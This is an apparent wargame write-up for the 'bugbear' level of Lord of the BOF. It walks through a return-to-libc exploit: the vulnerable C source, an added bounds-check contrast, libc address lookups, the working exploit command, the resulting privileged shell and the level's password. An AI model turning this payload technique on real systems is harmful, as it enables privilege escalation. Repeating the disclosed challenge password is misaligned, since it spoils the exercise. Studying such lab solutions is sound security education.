bugbear
Keyword: RTL
```c
/* The Lord of the BOF : The Fellowship of the BOF - bugbear - RTL1 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* declares strcpy(); missing from the original listing */

int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    /* Byte 47 of argv[1] is the high byte of the address that overwrites RET:
       reject it when it is 0xbf (a stack address). */
    if(argv[1][47] == '\xbf')
    {
        printf("stack betrayed you!!\n");
        exit(0);
    }

    /* Unbounded copy into a 40-byte buffer: the overflow this level is about. */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
```
The branch filters on the leading (most significant) byte of the address that overwrites RET: if argv[1][47] is '\xbf', the program exits.
In other words, an address starting with 0xbf cannot be used as the return address, so the return address has to point somewhere other than the stack.
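Added example (not part of the original write-up or the LOB challenge sources): it reproduces the single-byte check bugbear performs on input[47] and sets it beside a length-based copy that refuses any argument which does not fit the 40-byte buffer. The point is that the byte filter only screens out one address range, while a bounds check removes the overflow itself. All function names are hypothetical; 0xbffffa80 is a constructed stack-range address, and 0x40058ae0 is the system() address quoted later in the write-up.

```c
/* Added example, not from the original write-up or the LOB challenge code.
 * Contrasts bugbear's byte filter with a length-based fix. Function names
 * are hypothetical. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define BUF_SIZE   40   /* char buffer[40] in bugbear */
#define RET_OFFSET 44   /* buffer(40) + int i(4): RET follows, per the write-up's "A"*44 */
#define INPUT_MAX  255

/* The check bugbear performs: look only at input[47], the most significant
 * byte of the little-endian return address, and reject 0xbf. */
int filter_rejects(const char *input, size_t len)
{
    if (len < RET_OFFSET + 4)
        return 0;                       /* too short to reach byte 47 */
    return (unsigned char)input[RET_OFFSET + 3] == 0xbf;
}

/* Helper: place addr (little-endian) in the RET slot of a constructed input
 * and report what the filter decides about it. */
int filter_rejects_address(uint32_t addr)
{
    char input[RET_OFFSET + 4];
    memset(input, 'A', RET_OFFSET);
    for (int k = 0; k < 4; k++)
        input[RET_OFFSET + k] = (char)((addr >> (8 * k)) & 0xff);
    return filter_rejects(input, sizeof input);
}

/* Hardened replacement for strcpy(buffer, argv[1]): refuse any input that
 * does not fit, whatever bytes it contains. Returns 0 on success, -1 if too long. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);            /* includes the terminating NUL */
    return 0;
}

/* Report whether the hardened program accepts an argument of the given length
 * (constructed as a run of 'A's). */
int hardened_accepts_len(size_t len)
{
    char arg[INPUT_MAX + 1];
    char buffer[BUF_SIZE];
    if (len > INPUT_MAX)
        len = INPUT_MAX;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return copy_bounded(buffer, sizeof buffer, arg) == 0;
}

int main(void)
{
    /* 0xbffffa80: constructed stack-range address. 0x40058ae0: the system()
     * address quoted in the write-up; its top byte is 0x40, so the filter passes it. */
    printf("filter rejects 0xbffffa80: %d\n", filter_rejects_address(0xbffffa80));
    printf("filter rejects 0x40058ae0: %d\n", filter_rejects_address(0x40058ae0));
    printf("hardened accepts 39 bytes: %d\n", hardened_accepts_len(39));
    printf("hardened accepts 48 bytes: %d\n", hardened_accepts_len(48));
    return 0;
}
```

Run it and the two results line up with the write-up: the filter turns away a 0xbf-prefixed address but says nothing about a 0x40-prefixed libc address, whereas copy_bounded rejects every argument of 40 bytes or more before any address byte matters.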
Payload scenario:
"A"*44 + &system + "A"*4 + &"/bin/sh"
```
[darkknight@localhost darkknight]$ ldd bugbear
        libc.so.6 => /lib/libc.so.6 (0x40018000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[darkknight@localhost darkknight]$ strings -tx /lib/libc.so.6 | grep "/bin/sh"
  e3ff9 /bin/sh
  e6587 /bin/sh
  e6595 /bin/sh
  e796a /bin/sh
  e81c7 /bin/sh
  e8778 /bin/sh
```
&system: 0x40058ae0
&"/bin/sh": 0x400fbff9 (libc base 0x40018000 + the first string offset 0xe3ff9)
```
[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@AAAA�@
bash$ my-pass
euid = 513
new divide
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
```
bugbear / new divide
If I have described a concept incorrectly or solved something the wrong way, I would appreciate a comment :) Critical comments or email (513.eunice@gmail.com) are welcome!! 😊☺️👍